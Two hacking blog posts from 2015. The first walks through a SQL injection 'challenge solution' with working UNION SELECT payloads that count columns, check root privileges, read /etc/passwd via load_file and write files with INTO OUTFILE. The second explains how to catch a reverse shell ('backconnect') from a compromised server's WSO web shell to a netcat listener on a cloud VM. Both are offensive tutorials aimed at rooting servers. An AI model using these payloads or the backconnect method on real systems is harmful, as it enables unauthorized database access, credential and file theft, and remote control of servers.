Thursday, December 24, 2015

SQLi Challenge Solution 2

Okay First hello to all :p .. The Method is used in this Challenge is Root Privilleges Method.

Okay then let's start :

1. First of all we'll see that site is vuln or not.' > Error :D Text disappeared it means it's vuln

2. Now Time to find which comment is working order by 2222222-- > No error It means we've to try now String Based SQLi' order by 222222--+ > Error :D its working

2. Now We've to Dump Vuln Columns' order by 20--+ > error' order by 15--+ > No error' order by 17--+ > Error' order by 16--+ > No error

So, Total Columns are 16.

Now We've to dump Columns.' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+ > Vuln Columns is 3

3. Now we've to see that Website have root privilleges or not.

To see it we've to use this query.


Use it in vuln column.' union select 1,2,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),4,5,6,7,8,9,10,11,12,13,14,15,16--+

Yeahhhh :D it's showing root@localhost > Yes it means We've Root Privilleges access.

4. Now We've to Check website path for Upload shell

Users path exist in passwd file So, we'll load that file to see the path. For this we'll use following command :

load_file('/etc/passwd')' union select 1,2,load_file('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16--+

:'( No luck no path there

5. If You can't able to find the path then remember tmp dir is always writable ^_^

To Upload file in tmp folder we'll use following Command

into outfile '/tmp/test.txt'' union select 1,2,'Testing',4,5,6,7,8,9,10,11,12,13,14,15,16 into outfile '/tmp/test.txt'--+

6. To Open your uploaded file We'll use load_file' union select 1,2,load_file('/tmp/test.txt'),4,5,6,7,8,9,10,11,12,13,14,15,16--+

Wahoooooo :)))) It's working .....

Hope You like my tutorial ( Solution of 2nd Challenge ) .


Sunday, December 13, 2015

BackConnect Without Router

Hello Guys ! I know many people wants to root server but their internet don't forward port :)

But Now you can BackConnect with any Internet Connections.

So, Just Follow me :-

1. Make account on

2. Build VM It'll take time.

3. Upload NetCat with wget Function in Terminal. Command : wget -O

4. Now Unzip netcat with this command : unzip
" Hurray ! We Install NetCat successfully :) "

5. Now execute this command : nc -lvp 1337

6. Now You'll see written " koding-vm-0 " in top left and in that option You'll see settings button.

7. Click on settings button and There You'll see Public IP,Copy that IP.

8. Now goto that Server in which you want to backconnect

9. Click on Network ( WSO Shell ) And now Paste Public IP in IP and Write 1337 in port and then click on connect.

10.Now go back to VM to see that it's connected or not. Execute this command : ls ( to check )

Yahooooooooo ! :D We Successfully BackConnect the server

Hope You Like my tutorial. Thanks to Kashmiri Cheetah